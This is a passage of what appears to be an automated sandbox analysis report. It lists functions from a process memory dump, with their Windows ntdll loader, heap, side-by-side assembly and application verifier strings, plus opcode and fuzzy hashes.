                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FE2409
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FE2506
                                  • @, xrefs: 00FE259B
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FE24C0
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FE2412
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FE2624
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: 5288463be45af12578a698e3eed17e1e93ba014672dc1ae08dec388deb83c524
                                  • Instruction ID: b07b2b62d0bfc6a1c20a2987efb6c4b4efc490285c76ace812f14159b0b2c607
                                  • Opcode Fuzzy Hash: 5288463be45af12578a698e3eed17e1e93ba014672dc1ae08dec388deb83c524
                                  • Instruction Fuzzy Hash: 740262F2D002689BDB71DB15CC81BDDB7B8AF45724F0041EAA609A7241EB349F84EF59
                                  Function 01018B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  • Opcode ID: e2dec7c154d33ce43950d6485f76ed2299b02eed4bf689700b1f3c86e29ca4b8
                                  • Instruction ID: 5d926383a66821f7e0ca0be58bbabc68d1ae04c9fec2147390201a9738e23b6b
                                  • Opcode Fuzzy Hash: e2dec7c154d33ce43950d6485f76ed2299b02eed4bf689700b1f3c86e29ca4b8
                                  • Instruction Fuzzy Hash: 1B51D2B11083059BD325EF188848BABBBE8FF84340F54891EF998C3249E778D604DBD2
                                  Function 01020274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  • Opcode ID: aee0ebaf540824922077953dd2fd9976923fba291a11cde493e098b9415f760b
                                  • Instruction ID: c6b7d2bd6f5f0e722813e1bb541f130143cf81d17a6ed0f059738a352a420a68
                                  • Opcode Fuzzy Hash: aee0ebaf540824922077953dd2fd9976923fba291a11cde493e098b9415f760b
                                  • Instruction Fuzzy Hash: 45D1E0316007A5DFDB22DF68C845AAEBBF1FF4A704F088099F5859B666C739D980DB10
                                  Function 00FF89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  • VerifierDebug, xrefs: 00FF8CA5
                                  • VerifierFlags, xrefs: 00FF8C50
                                  • VerifierDlls, xrefs: 00FF8CBD
                                  • AVRF: -*- final list of providers -*- , xrefs: 00FF8B8F
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FF8A3D
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FF8A67
                                  • HandleTraces, xrefs: 00FF8C8F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: 4587ab3330010277dffc0d0d759d6e0370ec2cd8963029e9462e9dee53b19187
                                  • Instruction ID: 28add1ffc71ab32adb01d5332ee069c746bb1b1379ac4825d286bff7cc481b6e
                                  • Opcode Fuzzy Hash: 4587ab3330010277dffc0d0d759d6e0370ec2cd8963029e9462e9dee53b19187
                                  • Instruction Fuzzy Hash: 02913872A0531AAFD321DF24CC81B2A77A4EF84794F040418FB806B2A1DB79EC06E791
                                  Function 00F7EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: 1dd1dc67577360e7733d2347bab525281d4cfaa5fc4279677f922bc497e1a68b
                                  • Instruction ID: ac84745b02a0cbf50cf7d1d70976398c0b22141d0a75525f1f84ba0b19c543c5
                                  • Opcode Fuzzy Hash: 1dd1dc67577360e7733d2347bab525281d4cfaa5fc4279677f922bc497e1a68b
                                  • Instruction Fuzzy Hash: 15A22C75E056298FDB64DF14CC887A9B7B5AF49314F2482EAD80DA7350DB30AE85EF01
                                  Function 00FA63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: 3b056190b913b231f979244df63722cb2d3f76c9bd4f9147c591e849804db139
                                  • Instruction ID: 7653a61f7dfd6eae113e64fa6cd04ff652dc03809a35214b7807fba1b1776928
                                  • Opcode Fuzzy Hash: 3b056190b913b231f979244df63722cb2d3f76c9bd4f9147c591e849804db139
                                  • Instruction Fuzzy Hash: B19143B1E003549BDB35DF15DC45BAA37A0BB4AB64F18012DFA40AB2D1D77DA801F791
                                  Function 00FA2CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                  Download Yara Rule
                                  Strings
                                  • .Local\, xrefs: 00FA2D91
                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00FE2706
                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00FE279C
                                  • @, xrefs: 00FA2E4D
                                  • \WinSxS\, xrefs: 00FA2E23
                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00FE276F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                  • API String ID: 0-3926108909
                                  • Opcode ID: e2c5eb6d29f6533903cca2a20dea9e9dcf98b4a72483ef2ab346bcd513695161
                                  • Instruction ID: 471df14a18f72b3a060e910767356171858bf80dbe9580cfd9a48c4296ffe1e9
                                  • Opcode Fuzzy Hash: e2c5eb6d29f6533903cca2a20dea9e9dcf98b4a72483ef2ab346bcd513695161
                                  • Instruction Fuzzy Hash: 8F81EFB26043419FDB51CF19C890A6BBBE8FF86710F04895DF884DB252E774D944EBA2
                                  Function 00F6645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  • apphelp.dll, xrefs: 00F66496
                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FC9A11, 00FC9A3A
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00FC9A01
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00FC9A2A
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00FC99ED
                                  • LdrpInitShimEngine, xrefs: 00FC99F4, 00FC9A07, 00FC9A30
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-204845295
                                  • Opcode ID: ddf528e98ac3cb556f85194c68308ba0d6dbc57270953485627bd1b6decf2b11
                                  • Instruction ID: 35949154688e75eb75821a6c58d8f0d398e7fd32b7bc4729258e3d56bb397e5f
                                  • Opcode Fuzzy Hash: ddf528e98ac3cb556f85194c68308ba0d6dbc57270953485627bd1b6decf2b11
                                  • Instruction Fuzzy Hash: 4C51AEB12083019FD320DF24DD46FAB77E4BB84754F14091DF9869B1A1DA79E904AB92
                                  Function 00FAC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FE8181, 00FE81F5
                                  • LdrpInitializeProcess, xrefs: 00FAC6C4
                                  • LdrpInitializeImportRedirection, xrefs: 00FE8177, 00FE81EB
                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FAC6C3
                                  • Loading import redirection DLL: '%wZ', xrefs: 00FE8170
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FE81E5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: b0c5b15ab04f8470ef5372cabfec2e5b8d2f2208a134cb96d3e0f9504d9a5b4a
                                  • Instruction ID: d38b177581bf6e8251bd2f7f1afee35b2acb8cd4320d1e8ec37273dc4a387a46
                                  • Opcode Fuzzy Hash: b0c5b15ab04f8470ef5372cabfec2e5b8d2f2208a134cb96d3e0f9504d9a5b4a
                                  • Instruction Fuzzy Hash: B73129B17447459FD220FF29DD46E2A7794FF81B50F040528F984AB392EA28EC05E7E2
                                  Function 00FA2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FE21BF
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FE2178
                                  • RtlGetAssemblyStorageRoot, xrefs: 00FE2160, 00FE219A, 00FE21BA
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FE2180
                                  • SXS: %s() passed the empty activation context, xrefs: 00FE2165
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FE219F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: adf3d785aba6c29f088d97cf3e0587e2f20aaaa7eaeb1ce585a784bf2ee120cb
                                  • Instruction ID: 57ea711caae04f87dde4bbb9011aab141052f9a40ac01c2e0c883e5990b23ad2
                                  • Opcode Fuzzy Hash: adf3d785aba6c29f088d97cf3e0587e2f20aaaa7eaeb1ce585a784bf2ee120cb
                                  • Instruction Fuzzy Hash: E9312472F00364B7E7209E9A8C86F6A7668DF56B51F150069FB04A7281E274DF00F3A2
                                  Function 00FB096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FB2DF0: LdrInitializeThunk.NTDLL ref: 00FB2DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0D74
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: aa8e52f0e988b70ac905938740b47ab964df05582e0cd27657de6f4a1e288b37
                                  • Instruction ID: 7fbda786996ad59fcdeec1c60e71d05c3ea2ef573041ed52af0fb56306318252
                                  • Opcode Fuzzy Hash: aa8e52f0e988b70ac905938740b47ab964df05582e0cd27657de6f4a1e288b37
                                  • Instruction Fuzzy Hash: A9425A729007159FDB60CF25C881BEAB7F5BF44310F1445A9E989EB242EB74EA84DF60
                                  Function 00F7A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: 6df4352d34cff2e79a48a2816dfff08329f2a40f1fd125c6a556fd9b1827059d
                                  • Instruction ID: db54a79d3d0422bc867584164f773588708252765327a1cf989bfc6a52445559
                                  • Opcode Fuzzy Hash: 6df4352d34cff2e79a48a2816dfff08329f2a40f1fd125c6a556fd9b1827059d
                                  • Instruction Fuzzy Hash: FBC189715083828FC711CF18C544B6EB7E4BF84714F09896AF8998B261E779CA49EB93
                                  Function 00FA8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                  Download Yara Rule
                                  Strings
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FA855E
                                  • @, xrefs: 00FA8591
                                  • LdrpInitializeProcess, xrefs: 00FA8422
                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FA8421
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  • Opcode ID: 9553090470211788c14c0b99d7501db718ae233e192633ad285a2d0c5453fa40
                                  • Instruction ID: 4583a6598cf770ee1639eb142ed1bf1caa08d26a56620ea87ec1bc778ab53eee
                                  • Opcode Fuzzy Hash: 9553090470211788c14c0b99d7501db718ae233e192633ad285a2d0c5453fa40
                                  • Instruction Fuzzy Hash: E691B1B1908340AFD721EF21CC41FABBBE8BF85794F44492DFA8492051DB78D905EB62
                                  Function 00FA273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • .Local, xrefs: 00FA28D8
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FE21D9, 00FE22B1
                                  • SXS: %s() passed the empty activation context, xrefs: 00FE21DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FE22B6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: 1825b44e963fe7fbe882d4aade4cccd9198b98a37e67131eed34d3955fa63e8a
                                  • Instruction ID: 5d026474494d9745bdbff5dbdc1a50f7cbc0176c5c68391b3894f12e3d844405
                                  • Opcode Fuzzy Hash: 1825b44e963fe7fbe882d4aade4cccd9198b98a37e67131eed34d3955fa63e8a
                                  • Instruction Fuzzy Hash: 78A1E471E00229DBDB64CF69CC84BA9B3B4BF59724F2441E9E908A7251D7349E80EF90
                                  Function 00FA4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FE3456
                                  • RtlDeactivateActivationContext, xrefs: 00FE3425, 00FE3432, 00FE3451
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FE3437
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FE342A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  • Opcode ID: e9a1a81c142ee4c47b1881e9c1299c2663fdf8bc53de108fc309113f413b6e91
                                  • Instruction ID: 24ff24c09317f985e779f7b69344926d8cd8b7dae23cbd5bca59ea7f55e656bc
                                  • Opcode Fuzzy Hash: e9a1a81c142ee4c47b1881e9c1299c2663fdf8bc53de108fc309113f413b6e91
                                  • Instruction Fuzzy Hash: 7C613772A40B519BC722CF19C84AB2AB3E5EFC1B70F148529F8559B291C774FD01EB91
                                  Function 00F764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                  Download Yara Rule
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FD10AE
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FD0FE5
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FD106B
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FD1028
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  • Opcode ID: f7bb0c69882a5c0fbaa7125f5dbdd20505f7295ad6b42905f8665785a4172636
                                  • Instruction ID: e17917e722de02ca153cdbba4c8add4447c6fb5300410f0c76e2bbceeaef2709
                                  • Opcode Fuzzy Hash: f7bb0c69882a5c0fbaa7125f5dbdd20505f7295ad6b42905f8665785a4172636
                                  • Instruction Fuzzy Hash: C071CEB19047049FCB20EF14C885F9B7BA9AF84760F14446AF9488B286D738D588FBD2
                                  Function 00F9245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpDynamicShimModule, xrefs: 00FDA998
                                  • apphelp.dll, xrefs: 00F92462
                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FDA9A2
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FDA992
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: 46586d1965132bd6a90c2527484954702af166c3b702faf8fef12ced554af14a
                                  • Instruction ID: dffb4903c0f0a9bfaec11b9029a92611717c819f05e5e9d2068fdf3e622350d3
                                  • Opcode Fuzzy Hash: 46586d1965132bd6a90c2527484954702af166c3b702faf8fef12ced554af14a
                                  • Instruction Fuzzy Hash: A6317B72A00201EFDB30DF69DC81A6A77B5FB80B14F29011AF9456B365C7799C41E782
                                  Function 00F829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 00F83255
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F8327D
                                  • HEAP: , xrefs: 00F83264
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  • Opcode ID: b367a01b97af68a6a8fb5e341076f66a7cb8515c956afd3755d43f62d133fb74
                                  • Instruction ID: 2ba5eea66dcc042ac47b30792758202e0e57c1e83e46f5c6e20ad8dd055149c0
                                  • Opcode Fuzzy Hash: b367a01b97af68a6a8fb5e341076f66a7cb8515c956afd3755d43f62d133fb74
                                  • Instruction Fuzzy Hash: 1792BC71E042489FDB25DF68C844BEEBBF1FF48714F18805AE845AB251D739AA41EF50
                                  Function 00F80770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: a458fb119adb1e6315ee747f8ff0dea5fe7c0a95dd8e2002c9eee899b5dfc409
                                  • Instruction ID: 2e019467960ef2a9826a7fc7336cfaad282e880e1d66b22962a93d6d2dbb9f80
                                  • Opcode Fuzzy Hash: a458fb119adb1e6315ee747f8ff0dea5fe7c0a95dd8e2002c9eee899b5dfc409
                                  • Instruction Fuzzy Hash: 4BF1DF31B00A05DFDB24DF68C884BAAB7B6FF44710F248169E4569B391DB34ED85EB90
                                  Function 00F96962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $@
                                  • API String ID: 0-1077428164
                                  • Opcode ID: 63596a5898475c00b3be180a0fe3d72ca345c14ab9c6aefffee34f8f4f7d11d0
                                  • Instruction ID: 02f44fcdecdcabc629b84428960d21cc7a738b4f3c19c29e0cfa4740d70bf546
                                  • Opcode Fuzzy Hash: 63596a5898475c00b3be180a0fe3d72ca345c14ab9c6aefffee34f8f4f7d11d0
                                  • Instruction Fuzzy Hash: 9AC29172A1C3419FEB25DF24C841BABB7E5AF88714F14892EF989C7241D734D805EB92
                                  Function 00F6A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: 227570bc4c620c0a4969862ed281b4c5dbabda70478e8f40ce56b1be0490d71f
                                  • Instruction ID: ef43c1a8aa1ea4153d03c27114c8df10d12769c01c724e14a35cda19cf6cbd9d
                                  • Opcode Fuzzy Hash: 227570bc4c620c0a4969862ed281b4c5dbabda70478e8f40ce56b1be0490d71f
                                  • Instruction Fuzzy Hash: 67A16971D1122A9BDB31DB24CD99BEAB7B8EF44710F1041EAE90CA7250D7399E84DF90
                                  Function 00F90BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FDA121
                                  • LdrpCheckModule, xrefs: 00FDA117
                                  • Failed to allocated memory for shimmed module list, xrefs: 00FDA10F
                                  Memory Dump Source
